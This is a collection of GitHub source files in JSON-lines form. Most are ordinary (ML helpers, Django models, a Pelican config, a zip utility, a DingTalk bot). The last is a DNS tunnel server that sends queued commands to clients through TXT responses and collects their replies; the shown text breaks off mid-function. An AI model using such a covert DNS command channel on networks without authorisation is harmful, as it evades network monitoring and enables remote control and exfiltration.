\"\"\"\n # y = y.flatten() # Flatten for the DataLoader\n dataset = ToyDataset(X=X, y=y)\n return torch.utils.data.DataLoader(dataset, sampler=sampler, batch_size=BATCH_SIZE, shuffle=shuffle,\n num_workers=num_workers)\n\n\ndef abline(weight1, weight2, bias, label):\n axes = plt.gca()\n slope = -weight1 / weight2\n x_vals = np.array(axes.get_xlim())\n y_vals = -bias / weight2 + slope * x_vals\n plt.plot(x_vals, y_vals, '--', label=label)\n\n\ndef get_params(model):\n # Get the parameters of the model\n params = model.state_dict()\n weight1 = params['f1.weight'][0][0].numpy()\n weight2 = params['f1.weight'][0][1].numpy()\n bias = params['f1.bias'][0].numpy()\n return weight1, weight2, bias\n\n\ndef rotate(X, theta=45.00, ax_1=-1, ax_2=-2):\n theta = np.radians(theta)\n R = np.identity(X.shape[1])\n c, s = np.cos(theta), np.sin(theta)\n R[ax_1][ax_1], R[ax_1][ax_2], R[ax_2][ax_1], R[ax_2][ax_2] = c, s, -s, c\n X_noisy = np.array(np.matmul(X, R))\n return X_noisy\n\n\ndef get_samples_by_property(model, X_train_noisy, y_train, perc, most=True, prop='entropy', diversity=False,\n min_per_class=None, rand_swap=False, rand_perc=0.2, swap_less_informative=True,\n flatten=False):\n \"\"\"\n Compute a subset of the dataset according to a property of the samples and optionally following ad-hoc heuristics.\n :param model: network that performs the classification. Samples are fed into the network to be selected according\n to their classification property\n :param X_train_noisy: numpy array of noisy samples\n :param y_train: numpy array of labels\n :param perc: relative amount of samples you want to retrieve\n :param most: select the samples with the greatest property values, otherwise the ones with the smallest\n :param prop: ['entropy', 'cross_entropy', 'probability', 'first_vs_second']\n :param diversity: apply diversity heuristic, trying to maintain a balanced number of labels in the subset\n :param min_per_class: minimum number of samples that each class must contain in the subset. If None, the treshold is\n computed ad-hoc for each class using the following heuristic: min_per_class_i = int(n_labels_i * perc)\n :type min_per_class: integer or None\n :param rand_swap: swap selected elements from the subset with random samples not selected initially\n :param rand_perc: percentage of the elements to be swept\n :param swap_less_informative: if True, swap the elements which have the least entropy (if most=True)\n or the most entropy (if most=False)\n :return: X_train_noisy_subset, y_train_noisy_subset: subset of the samples\n \"\"\"\n unique_labels = len(np.unique(y_train))\n indices = compute_samples_property(model, X_train_noisy, y_train, unique_labels, prop, indices=True,\n flatten=flatten)\n n_samples = int(len(indices) * perc)\n\n if most:\n indices = indices[::-1]\n\n indices_subset = indices[:n_samples]\n\n if rand_swap:\n assert 0 <= rand_perc <= 1\n n_swap_elements = int(len(indices_subset) * rand_perc)\n\n if swap_less_informative:\n indices_removed = indices_subset[-n_swap_elements:]\n else:\n indices_removed = np.random.choice(indices_subset, size=n_swap_elements, replace=False)\n not_selected = np.setdiff1d(np.arange(len(indices)), indices_subset)\n indices_added = np.random.choice(not_selected, size=n_swap_elements, replace=False)\n\n # Remove old indices and concatenate new indices\n indices_subset = np.concatenate((np.setdiff1d(indices_subset, indices_removed), indices_added))\n\n X_train_noisy_subset = X_train_noisy[indices_subset]\n y_train_subset = y_train[indices_subset]\n return X_train_noisy_subset, y_train_subset\n\n\ndef get_random_subset(x_train_noisy, y_train, entropy_percentage, return_indices=False):\n total_len = x_train_noisy.shape[0]\n subset_len = int(total_len * entropy_percentage)\n indices = np.random.choice(total_len, subset_len, replace=False)\n x_train_noisy_subset = x_train_noisy[indices]\n y_train_subset = y_train[indices]\n\n if return_indices:\n return indices\n else:\n return x_train_noisy_subset, y_train_subset\n\n\ndef init_exponential_loss(X):\n weights_boosting = dict()\n for sample in X:\n weights_boosting[tuple(sample)] = 1 / len(X)\n criterion = WeightedLoss(X=X, weights_boosting=weights_boosting,\n indices=list(range(len(X))))\n return criterion, weights_boosting\n\n\ndef dataset_split(X, y, perc=VALIDATION_PERCENTAGE, random_state=RANDOM_SEED, return_data='samples'):\n \"\"\"\n Given two arrays of samples and label X and y, perform a random splitting in train and validation sets.\n :param X: numpy array of samples\n :param y: numpy array of labels\n :param val_perc: percentage of validation set\n :param random_state: random state of the splitter\n :param return_data: if True, return DataLoader objects instead of numpy arrays\n :return: (train_loader, val_loader) or (X_train, y_train), (X_val, y_val) or train_idx, val_idx\n \"\"\"\n assert 0 <= perc <= 1\n\n sss = StratifiedShuffleSplit(n_splits=1, test_size=perc, random_state=random_state)\n train_idxs, valid_idxs = next(sss.split(X, y))\n\n X_train, X_valid = X[train_idxs], X[valid_idxs]\n y_train, y_valid = y[train_idxs], y[valid_idxs]\n\n if return_data == 'data_loader':\n return get_data_loader(X_train, y_train), get_data_loader(X_valid, y_valid)\n elif return_data == 'samples':\n return (X_train, y_train), (X_valid, y_valid)\n elif return_data == 'indices':\n return train_idxs, valid_idxs\n\n\ndef convert_labels(y, old_labels, new_labels):\n \"\"\"\n Convert labels of a numpy array using an implicit mapping from old_labels to new_labels.\n :param y: numpy array of labels\n :param old_labels: e.g. [0, 1]\n :param new_labels: e.g. [-1, 1]\n :return: y_converted\n \"\"\"\n assert len(old_labels) == len(new_labels)\n if set(y) == set(new_labels):\n return y\n mapping = dict(zip(old_labels, new_labels))\n y_converted = [mapping[y_i] for y_i in y]\n return np.array(y_converted)\n\n\ndef evaluate_ensemble(ensemble, learning_rates, dataloader, device):\n \"\"\"\n Evaluate ensamble of models.\n :param ensemble:\n :param learning_rates:\n :param dataloader:\n :return:\n \"\"\"\n total = 0.0\n correct = 0.0\n with torch.no_grad():\n for data in dataloader:\n # Unwrap tuple\n input, labels = data\n # Move to GPU\n input, labels = input.to(device), labels.to(device)\n predicted = [0.0] * input.shape[0]\n for i, model in enumerate(ensemble):\n # Forward pass\n outputs = model(input)\n predicted = predicted + np.array(learning_rates[i]) * outputs.view(-1).tolist()\n predicted = np.where(predicted > 0, 1, -1)\n predicted = torch.FloatTensor(predicted)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n # Return accuracy\n return correct / total\n","repo_name":"tmscarla/improving-transfer-learning","sub_path":"image-recognition/toy-model/toy_utils.py","file_name":"toy_utils.py","file_ext":"py","file_size_in_byte":7876,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"1528529265","text":"def deep_flatten(iterable):\n \"\"\"\n a function that accepts a list of lists (or lists of tuples and lists) and\n returns a flattened version of that list of lists.\n \"\"\"\n flattened = []\n try:\n iterator = iter(iterable)\n for item in iterator:\n if isinstance(item, str):\n flattened.append(item)\n else:\n flattened = flattened + deep_flatten(item)\n except TypeError:\n flattened.append(iterable)\n\n return flattened\n","repo_name":"valerymelou/python-morsels","sub_path":"deep_flatten/deep_flatten.py","file_name":"deep_flatten.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70183365928","text":"import os\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom io import BytesIO\nfrom PIL import Image, ImageSequence\n\n\nclass Company(models.Model):\n name = models.CharField(max_length=100, unique=True)\n address = models.CharField(max_length=100, blank=True)\n phone = models.CharField(max_length=15, blank=True)\n email = models.EmailField(max_length=254, blank=True)\n website = models.URLField(max_length=200, blank=True)\n logo = models.ImageField(default='default_logo.png', upload_to='company_logos')\n\n max_storage = models.IntegerField(default=(100 * pow(1024, 2))) # store the max storage in bytes\n used_storage = models.IntegerField(default=0) # store the used storage in bytes\n\n class Meta:\n verbose_name_plural = 'companies'\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n super().save(*args, **kwargs)\n img = Image.open(self.logo.path)\n if img.height > 100 or img.width > 100:\n output_size = (100, 100)\n img.thumbnail(output_size)\n img.save(self.logo.path)\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n company = models.ForeignKey(Company, on_delete=models.CASCADE, null=True)\n image = models.ImageField(default='default.jpg', upload_to='profile_pics')\n phone = models.CharField(max_length=15, default='', blank=True)\n is_company_admin = models.BooleanField(default=False) # company admin can add users to the company\n get_backup_emails = models.BooleanField(default=True) # whether to get backup emails or not\n\n def __str__(self):\n return f\"{self.user.username} Profile\"\n\n def save(self, *args, **kwargs):\n super().save(*args, **kwargs)\n img = Image.open(self.image)\n\n if img.format == 'GIF':\n # trying to trigger the save method of the image field so that django_cleanups can clean up the old image\n self.image = self.resize_gif(img)\n\n elif img.format != 'GIF' and (img.height > 450 or img.width > 450):\n img_width = img.size[0] if img.size[0] < 450 else 450\n img_height = img.size[1] if img.size[1] < 450 else 450\n\n output_size = (img_width, img_height)\n img.thumbnail(output_size, Image.ANTIALIAS)\n img.save(self.image.path)\n\n\n def resize_gif(self, img):\n \"\"\"\n Resize a gif image by resizing each frame and then reassembling the frames into a new gif\n \"\"\"\n\n frame_width = img.size[0] if img.size[0] < 450 else 450\n frame_height = img.size[1] if img.size[1] < 450 else 450\n\n if frame_width == img.size[0] and frame_height == img.size[1]: # if the image is already the correct size\n return self.image\n\n frames = []\n durations = [] # Store frame durations\n disposal_methods = [] # Store disposal methods\n\n for frame in ImageSequence.Iterator(img):\n # Resize the frame\n frame = frame.resize((frame_width, frame_height), Image.ANTIALIAS)\n\n # Extract and store the frame duration and disposal method\n durations.append(frame.info.get(\"duration\", 100)) # Default duration is 100 ms\n disposal_methods.append(frame.info.get(\"disposal_method\", 0)) # Default disposal method is 0\n\n frames.append(frame)\n\n # Create a new GIF with frame durations and disposal methods\n with BytesIO() as output_buffer:\n frames[0].save(\n output_buffer,\n format=\"GIF\",\n save_all=True,\n append_images=frames[1:],\n duration=durations,\n disposal=disposal_methods,\n loop=img.info.get(\"loop\", 0) # Copy the loop count from the original\n )\n\n buffer = BytesIO(output_buffer.getvalue())\n\n return InMemoryUploadedFile(\n buffer,\n 'ImageField',\n os.path.normpath(self.image.path),\n 'image/gif',\n buffer.getbuffer().nbytes,\n None\n )\n","repo_name":"Fingolfin7/SoftriteAPI","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27301013073","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'firemark'\nSITENAME = 'Hackerspace Silesia'\nSITEURL = ''\n\nPATH = 'content'\nTHEME = 'Flex'\n\nTIMEZONE = 'Europe/Warsaw'\nPAGE_ORDER_BY = 'date'\n\nDEFAULT_LANG = 'pl'\n\nSITELOGO = '/images/logo.png'\nFAVICON = '/images/favicon.ico'\n\nPAGE_URL = '{slug}/'\nPAGE_SAVE_AS = '{slug}/index.html'\nPAGE_LANG_URL = '{slug}-{lang}/'\nPAGE_LANG_SAVE_AS = '{slug}-{lang}/index.html'\n\nARTICLE_URL = '{slug}/'\nARTICLE_SAVE_AS = '{slug}/index.html'\nARTICLE_LANG_URL = '{slug}-{lang}/'\nARTICLE_LANG_SAVE_AS = '{slug}-{lang}/index.html'\n\nCOPYRIGHT_NAME = '''\nhs-silesia team 2021.\nHosted on \"vultr\"\n'''\n\nHOME_HIDE_TAGS = True\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = \"feeds/atom.xml\"\nFEED_ALL_RSS = \"feeds/rss.xml\"\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nPLUGINS = ['jinja2content']\nJINJA2CONTENT_TEMPLATES = ['../templates']\nSTATIC_PATHS = ['extra', 'images']\n\nLINKS = (\n ('HS wiki', 'https://wiki.hs-silesia.pl/'),\n ('Planowane spotkania', 'https://wiki.hs-silesia.pl/wiki/Planowane_spotkania'),\n ('Finanse', 'http://finanse.hs-silesia.pl/'),\n ('E-mail do zarządu', 'mailto:info@hs-silesia.pl'),\n ('Grupa dyskusyjna', 'https://lists.hs-silesia.pl/archives/open/'),\n)\n\nSOCIAL = (\n ('facebook', 'https://www.facebook.com/HackerspaceSilesia'),\n ('twitter', 'https://twitter.com/hs_silesia'),\n ('github', 'https://github.com/hackerspace-silesia'),\n ('envelope', 'mailto:info@hs-silesia.pl'),\n)\n\nDEFAULT_PAGINATION = False\n\nMARKDOWN = {\n 'extension_configs': {\n 'markdown.extensions.toc': {},\n 'markdown.extensions.admonition': {},\n 'markdown.extensions.codehilite': {'css_class': 'highlight'},\n 'markdown.extensions.extra': {},\n 'markdown.extensions.meta': {},\n },\n 'output_format': 'html5',\n}\nCUSTOM_CSS = 'extra/custom.css'\nEXTRA_PATH_METADATA = {\n 'images/favicon.ico': {'path': 'favicon.ico'},\n}\n","repo_name":"hackerspace-silesia/new-site","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29556849764","text":"# coding = utf-8\n__AUTHOR__ = 'Abdul Somat Budiaji'\n\nimport os\nimport zipfile\n\nimport config\n\nclass Zipper(object):\n\n \"\"\"\n Kelas Zipper\n \"\"\"\n\n def __init__(self, time_0, time_1, tipe='auto'):\n\n self.time_0 = time_0\n self.time_1 = time_1\n\n self.path = config.Path(time_0, time_1, tipe=tipe)\n\n def zip_result(self):\n\n \"\"\"\n Memasukkan direktori hazard dan impact ke dalam file zip di dalam folder\n report\n \"\"\"\n\n # directory\n shape_impact_dir = self.path.shp_impact_dir\n shape_hazard_dir = self.path.shp_hazard_dir\n\n # hazard and impact dir (input)\n # dir_impact = shape_impact_dir + self.time_1\n # dir_hazard = shape_hazard_dir + self.time_1\n\n ## shapefile output\n zip_file = self.path.output_dir + 'shapefile_' + \\\n self.time_0 + '_' + self.time_1 + '.zip'\n o_zip = zipfile.ZipFile(zip_file, 'w')\n \n for file in os.listdir(self.path.shp_hazard_dir):\n # print os.path.join(self.path.shp_hazard_dir, file)\n path = os.path.join(self.path.shp_hazard_dir, file)\n if os.path.isfile(path):\n o_zip.write(path, arcname=file)\n \n for file in os.listdir(self.path.shp_impact_dir):\n # print os.path.join(self.path.shp_impact_dir, file)\n path = os.path.join(self.path.shp_impact_dir, file)\n if os.path.isfile(path):\n o_zip.write(path, arcname=file)\n\n o_zip.close()\n \n ## calculation csv output\n calc_zip_file = self.path.output_dir + 'calculation_' + \\\n self.time_0 + '_' + self.time_1 + '.zip'\n calc_o_zip = zipfile.ZipFile(calc_zip_file, 'w')\n \n for file in os.listdir(self.path.summary_dir):\n path = os.path.join(self.path.summary_dir, file)\n if os.path.isfile(path) and path.lower().endswith(('.csv')):\n calc_o_zip.write(path, arcname=file)\n \n ## dala_csv_filename = 'dala_' + self.time_0 + '_' + self.time_1 + '.csv'\n ## calc_o_zip.write(os.path.join(self.path.output_dir, dala_csv_filename), arcname=file)\n \n for file in os.listdir(self.path.output_dir):\n path = os.path.join(self.path.output_dir, file)\n if os.path.isfile(path) and path.lower().endswith(('.csv')):\n calc_o_zip.write(path, arcname=file)\n \n calc_o_zip.close()","repo_name":"frzdian/jaksafe-engine","sub_path":"jaksafe/jaksafe/jakservice/post_processing/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75368630888","text":"import configparser\nimport os\nimport time\nimport hmac\nimport hashlib\nimport base64\nimport urllib.parse\nimport requests,json\n\nclass ding_robot:\n def __init__(self):\n self.config = configparser.RawConfigParser()\n parent_dir = os.path.dirname(os.path.abspath(__file__))\n self.config.read(os.path.join(parent_dir,'conf/Ding.ini'))\n robots = eval(self.config.get('common','names'))\n robot_dict = {'sample_robot':{'access_token':'123','secret':'112233'}}\n for robot in robots:\n robot_dict[robot]['access_token'] = self.config.get(robot, 'access_token')\n robot_dict[robot]['secret'] = self.config.get(robot, 'secret')\n self.robot_dict = robot_dict\n\n\n def get_sign(self, secret):\n timestamp = str(round(time.time() * 1000))\n secret_enc = secret.encode('utf-8')\n string_to_sign = '{}\\n{}'.format(timestamp, secret)\n string_to_sign_enc = string_to_sign.encode('utf-8')\n hmac_code = hmac.new(secret_enc, string_to_sign_enc, digestmod=hashlib.sha256).digest()\n sign = urllib.parse.quote(base64.b64encode(hmac_code))\n return sign\n\n def push_message(self,robot,message):\n robot_info = self.robot_dict[robot]\n sign = self.get_sign(robot_info['secret'])\n timestamp = str(round(time.time() * 1000))\n headers={'Content-Type': 'application/json'} #定义数据类型\n webhook = f'https://oapi.dingtalk.com/robot/send?access_token={robot_info[\"access_token\"]}×tamp='+timestamp+\"&sign=\"+sign\n data = {\n \"msgtype\": \"text\",\n \"text\": {\"content\": f'{message}'},\n \"isAtAll\": True}\n res = requests.post(webhook, data=json.dumps(data), headers=headers) # 发送post请求","repo_name":"jsntcheng/SVAM","sub_path":"api_server/message/ding_talk.py","file_name":"ding_talk.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"4965988802","text":"import os\nimport asyncio\nfrom subprocess import check_output\nfrom scapy.all import DNS, DNSQR, DNSRR, raw\nimport weakref\nimport json\nfrom collections import OrderedDict\nfrom struct import Struct\nimport random\nimport time\nfrom datetime import datetime\nimport stat\nimport shutil\nimport sys\nfrom copy import deepcopy\nimport hashlib\nimport toml\nfrom cryptography.hazmat.backends import default_backend as crypto_default_backend\nfrom cryptography.hazmat.primitives.asymmetric import padding as crypto_padding\nfrom cryptography.hazmat.primitives import serialization as crypto_serialization, hashes as crypto_hashes\n\nfrom .helpers import get_logger, PYTHON_GREATER_37\nfrom .message import MessageBuilder\n\nlogger = None\nPATH_CONFIG = 'pydnst.toml'\n\nRESPOND_TO_KEEP_ALIVE = True\nRESPOND_ACK_TO_FRAGMENTS = True #True\nSERVER_SENDS_RSA_KEY_HASH_CONFIRMATION = False #True\nSERVER_SENDS_RSA_KEY_HASH_CONFIRMATION = SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION and RESPOND_ACK_TO_FRAGMENTS\n\nMSG_2_STRUCT = Struct('H') #2 bytes\nKA_COMMAND_ID = '0' #keep-alive command_id is 0\nRSA_COMMAND_ID = '1'\nACK_COMMAND_ID = '2'\nCOMMANDS_WITHOUT_ENCRYPTION = (KA_COMMAND_ID, RSA_COMMAND_ID, ACK_COMMAND_ID)\nCOMMANDS_WITHOUT_ACK = (KA_COMMAND_ID, ACK_COMMAND_ID) #with REQUEST_NEXT_FROM_SERVER and REQUEST_RSA_KEY_HASH_FROM_SERVER\nMIN_COMMAND_ID = 3\n\nREQUEST_NEXT_FROM_SERVER = b'nextpls'\nREQUEST_RSA_KEY_HASH_FROM_SERVER = b'cfrmpls'\n\n\nclass DnstServerProtocol(asyncio.DatagramProtocol):\n def __init__(self, tunnel_messages, tunnel_mng_messages, store_ordered_tunnel_messages, pending_fragments_to_send_events,\n server_private_key, shared_keys, DNST_SERVER_NAME, FILTERED_QUERY_NAMES, DEFAULT_SHARED_KEY):\n self.loop = asyncio.get_event_loop()\n self.is_server = True \n self.dnst_id = '0'\n self.transport = None\n self.DNST_SERVER_NAME = DNST_SERVER_NAME\n self.FILTERED_QUERY_NAMES = FILTERED_QUERY_NAMES\n self.DEFAULT_SHARED_KEY = DEFAULT_SHARED_KEY\n self.message_builder = MessageBuilder(logger, weakref.proxy(self), self.DNST_SERVER_NAME, self.DEFAULT_SHARED_KEY)\n self.max_data_length = self.message_builder.max_data_length['response'] \n if self.message_builder.max_fragment_payload_sizes['response']['TXT'] < 1:\n logger.error(f'Cannot work with too long domain name {self.DNST_SERVER_NAME}') \n sys.exit(1)\n #we enforce keep-alive to be only 1 fragment, by limiting the client_details size\n self.received_fragments = {} # {client_id : {command_id : {'date':'', 'list_of_fragments':[]} } , }\n #tunnel_messages stored in MESSAGES_JSON : \n #{client_id : {command_id : {'command_awaiting_ka | command_sent' : '', 'date' : '', 'response' : ''} }, }\n self.tunnel_messages, self.store_ordered_tunnel_messages = tunnel_messages , store_ordered_tunnel_messages\n self.pending_fragments_to_send_events = pending_fragments_to_send_events\n self.server_private_key, self.shared_keys = server_private_key, shared_keys\n self.tunnel_mng_messages = tunnel_mng_messages\n \n \n def connection_made(self, transport):\n self.peername = transport.get_extra_info('peername')\n if self.peername:\n logger.info(f'connection_made from : {self.peername}')\n self.transport = transport\n super().connection_made(transport)\n\n def datagram_received(self, data, addr):\n try:\n self.remote_address, self.remote_port = self.peername = addr\n logger.debug(f'datagram_received from {self.peername} : {data}')\n super().datagram_received(data, addr)\n data_scapy = DNS(data)\n qname_scapy = data_scapy.qd.qname\n if qname_scapy.rstrip(b'.') in self.FILTERED_QUERY_NAMES:\n return \n if self.DNST_SERVER_NAME not in qname_scapy:\n return\n logger.info(f'datagram_received from {self.peername} : {data}') \n logger.debug(f'Parsed datagram received : {DNS(data).show(dump=True)}')\n res = self.message_builder.reassemble_fragment(qname_scapy)\n if res is False:\n return\n \n client_id, command_id, fragment_id, number_of_fragments, is_ready = res\n if RESPOND_ACK_TO_FRAGMENTS: \n if command_id not in COMMANDS_WITHOUT_ACK:\n #event_desc = self.pending_fragments_to_send_events.get(client_id, {}).get(command_id, None)\n #if event_desc:\n # logger.info(f'During sending of pending fragments : Not responding ack to non last fragment {is_ready} for client {client_id} and command {command_id}')\n # self.received_fragments[client_id].pop(command_id, None)\n ## self.send_next_fragment(client_id, command_id, 'TXT', addr, data_scapy)\n # return\n send_ack = True\n message_entry = self.tunnel_mng_messages.get(command_id, {}).get(client_id, None)\n if message_entry:\n if message_entry.startswith(REQUEST_NEXT_FROM_SERVER):\n logger.info(f'tunnel_mng_messages : Not sending ack to a REQUEST_NEXT_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}') \n send_ack = False\n elif message_entry.startswith(REQUEST_RSA_KEY_HASH_FROM_SERVER): \n logger.info(f'tunnel_mng_messages : Not sending ack to a REQUEST_RSA_KEY_HASH_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}')\n send_ack = False\n message_entry = self.tunnel_messages.get(client_id, {}).get(command_id, {}).get('command_sent', None)\n if message_entry:\n if message_entry.encode().startswith(REQUEST_NEXT_FROM_SERVER):\n logger.info(f'tunnel_messages : Not sending ack to a REQUEST_NEXT_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}') \n send_ack = False\n elif message_entry.encode().startswith(REQUEST_RSA_KEY_HASH_FROM_SERVER): \n logger.info(f'tunnel_messages : Not sending ack to a REQUEST_RSA_KEY_HASH_FROM_SERVER to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}')\n send_ack = False \n if send_ack: \n logger.info(f'Responding ack to fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}') \n ack_response = str(fragment_id) + '-' + str(random.randint(1,256)) #send ack with the fragment index in is_ready\n self.send_data(ack_response.encode(), ACK_COMMAND_ID, client_id, addr,\n rtype='TXT', data_scapy=data_scapy) \n if is_ready is not True: \n return\n if self.server_private_key:\n if command_id in (RSA_COMMAND_ID, ACK_COMMAND_ID):\n message_entry = self.tunnel_mng_messages[command_id].pop(client_id, b'')\n if message_entry:\n if message_entry.startswith(REQUEST_RSA_KEY_HASH_FROM_SERVER):\n if SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION:\n hasher = hashlib.sha256()\n hasher.update(self.shared_keys[client_id])\n shared_key_hash = hasher.digest()\n logger.info(f'Sending shared_key hash response for client {client_id}')\n shared_key_hash_response = self.server_private_key.sign(\n shared_key_hash,\n crypto_padding.PSS(\n mgf=crypto_padding.MGF1(crypto_hashes.SHA256()),\n salt_length=crypto_padding.PSS.MAX_LENGTH\n ),\n crypto_hashes.SHA256()\n ) \n self.send_data(shared_key_hash_response, RSA_COMMAND_ID, client_id, addr,\n rtype='TXT', data_scapy=data_scapy)\n return\n elif command_id == RSA_COMMAND_ID: \n if message_entry.startswith(REQUEST_NEXT_FROM_SERVER):\n event_desc = self.pending_fragments_to_send_events.get(client_id, {}).get(command_id, None) \n if event_desc:\n try:\n fragment_acked = int(message_entry.split(b'-')[1])\n except Exception:\n logger.exception(f'Invalid REQUEST_NEXT_FROM_SERVER content received from client {client_id} : {message_entry}')\n return\n logger.info(f'Received request from client {client_id} and command {command_id} to send next rsa fragment, after fragment {fragment_acked} was acked') \n self.send_next_fragment(client_id, command_id, fragment_acked, 'TXT', addr, data_scapy)\n else:\n logger.info(f'Received request from client {client_id} and command {command_id} to send next rsa fragment, but no pending fragment')\n return\n logger.info(f'Received shared_key for client {client_id}, decrypting it')\n self.shared_keys[client_id] = self.server_private_key.decrypt(\n message_entry,\n crypto_padding.OAEP(\n mgf=crypto_padding.MGF1(algorithm=crypto_hashes.SHA256()),\n algorithm=crypto_hashes.SHA256(),\n label=None\n ))\n \n self.message_builder.use_shared_key_for_client(client_id, self.shared_keys[client_id])\n return\n elif client_id not in self.shared_keys:\n logger.info(f'Received command {command_id} from client {client_id} without having a shared_key for that client, asking one...')\n hasher = hashlib.sha256()\n hasher.update(b'Asking for a shared_key') #dummy error message, anything different from the real shared_key_hash will lead the client to send it again\n ask_for_shared_key = hasher.digest() \n server_response = self.server_private_key.sign(\n ask_for_shared_key,\n crypto_padding.PSS(\n mgf=crypto_padding.MGF1(crypto_hashes.SHA256()),\n salt_length=crypto_padding.PSS.MAX_LENGTH\n ),\n crypto_hashes.SHA256()\n ) \n self.send_data(server_response, RSA_COMMAND_ID, client_id, addr,\n rtype='TXT', data_scapy=data_scapy)\n return \n \n tunnel_messages = self.tunnel_messages[client_id]\n if command_id == KA_COMMAND_ID:\n logger.info(f'Received keep-alive from {client_id}, with transaction id {data_scapy.id}, and name {qname_scapy}')\n #check if there is a command to send for this client\n for cmd_id in tunnel_messages:\n if cmd_id != KA_COMMAND_ID and (tunnel_messages[cmd_id].get('command_awaiting_ka') or ( tunnel_messages[cmd_id].get('command_sent') and not tunnel_messages[cmd_id].get('response'))):\n command_to_send = tunnel_messages[cmd_id].pop('command_awaiting_ka', None)\n if command_to_send is None:\n #this can happen with weird dns servers sending cached requests with delay\n command_to_send = tunnel_messages[cmd_id]['command_sent']\n logger.info('Trying to send again command {cmd_id} : {command_to_send}') \n logger.info(f'There is a command to send to this client {client_id} : {command_to_send}')\n tunnel_messages[cmd_id]['command_sent'] = command_to_send\n self.store_ordered_tunnel_messages(self.tunnel_messages)\n self.send_data(command_to_send.encode(), cmd_id, client_id, addr, rtype='TXT', data_scapy=data_scapy)\n break\n else:\n if RESPOND_TO_KEEP_ALIVE:\n dummy_response = str(random.randint(1,256))\n logger.info(f'No command to send to client {client_id}, sending dummy response {dummy_response} to keep-alive')\n self.send_data(dummy_response.encode(), KA_COMMAND_ID, client_id, addr,\n rtype='TXT', data_scapy=data_scapy)\n else:\n logger.info(f'No command to send to client {client_id}') \n \n else:\n command_sent = self.tunnel_messages.get(client_id, {}).get(command_id, {}).get('command_sent', None)\n message_entry = self.tunnel_messages.get(client_id, {}).get(command_id, {}).get('response', None)\n if message_entry: \n logger.info(f'Received valid response to command {command_sent} from client {client_id} with transaction id {data_scapy.id}') \n #the response was already written in self.tunnel_messages by message.reassemble_fragment\n if message_entry.encode().startswith(REQUEST_NEXT_FROM_SERVER):\n event_desc = self.pending_fragments_to_send_events.get(client_id, {}).get(command_id, None) \n if event_desc:\n try:\n fragment_acked = int(message_entry.split(b'-')[1])\n except Exception:\n logger.exception(f'Invalid REQUEST_NEXT_FROM_SERVER content received from client {client_id} : {message_entry}')\n return\n logger.info(f'Received request from client {client_id} and command {command_id} to send next fragment, after fragment {fragment_acked} was acked') \n self.send_next_fragment(client_id, command_id, fragment_acked, 'TXT', addr, data_scapy)\n else:\n logger.info(f'Received request from client {client_id} and command {command_id} to send next fragment, but no pending fragment') \n return\n else:\n logger.info(f'Received valid response but no matching client {client_id} and command {command_id}. Ignoring...') \n except Exception:\n logger.exception('datagram_received')\n try:\n logger.error(f'invalid datagram_received from {self.peername} : {data}')\n except Exception:\n pass\n\n def send_data(self, data, command_id, client_id, addr, rtype='TXT', data_scapy=None, without_encryption=False):\n logger.info(f'Sending data of length {len(data)}')\n if command_id in COMMANDS_WITHOUT_ENCRYPTION:\n without_encryption = True\n if len(data) > self.max_data_length:\n logger.info(f'Truncating data of length {len(data)} to {self.max_data_length}')\n data = data[:self.max_data_length]\n fragments = self.message_builder.fragmenter(data, rtype, client_id, command_id, is_dns_response=True,\n without_encryption=without_encryption)\n self.loop.create_task(self.send_fragments(command_id, client_id, fragments, rtype, addr, data_scapy))\n \n async def send_fragments(self, command_id, client_id, fragments, rtype, addr, data_scapy=None):\n logger.info(f'Starting send_fragments task for transaction id {data_scapy.id}')\n number_of_fragments = len(fragments)\n logger.info(f'Sending fragment 1 out of {number_of_fragments}')\n if number_of_fragments > 1:\n #prepare mechanism for sending of multiple fragments\n if client_id not in self.pending_fragments_to_send_events:\n self.pending_fragments_to_send_events[client_id] = {}\n self.pending_fragments_to_send_events[client_id][command_id] = {'list':deepcopy(fragments), 'number_of_fragments':number_of_fragments}\n self.send_message(fragments[0], rtype, addr, data_scapy)\n\n def send_next_fragment(self, client_id, command_id, fragment_acked, rtype, addr, data_scapy):\n #next fragments will be sent on the next udp sockets querying them\n pointer = self.pending_fragments_to_send_events[client_id][command_id]\n pointer_list = pointer['list']\n if not all([(el is True) for el in pointer_list]):\n pointer_list[fragment_acked-1] = True #True means this fragment was successfully acked by client\n for index in range(len(pointer_list)):\n fragment = pointer_list[index]\n if fragment is not True:\n logger.info(f'Sending fragment {index+1} out of {pointer[\"number_of_fragments\"]}')\n self.send_message(fragment, rtype, addr, data_scapy)\n break\n if all([(el is True) for el in pointer_list]):\n 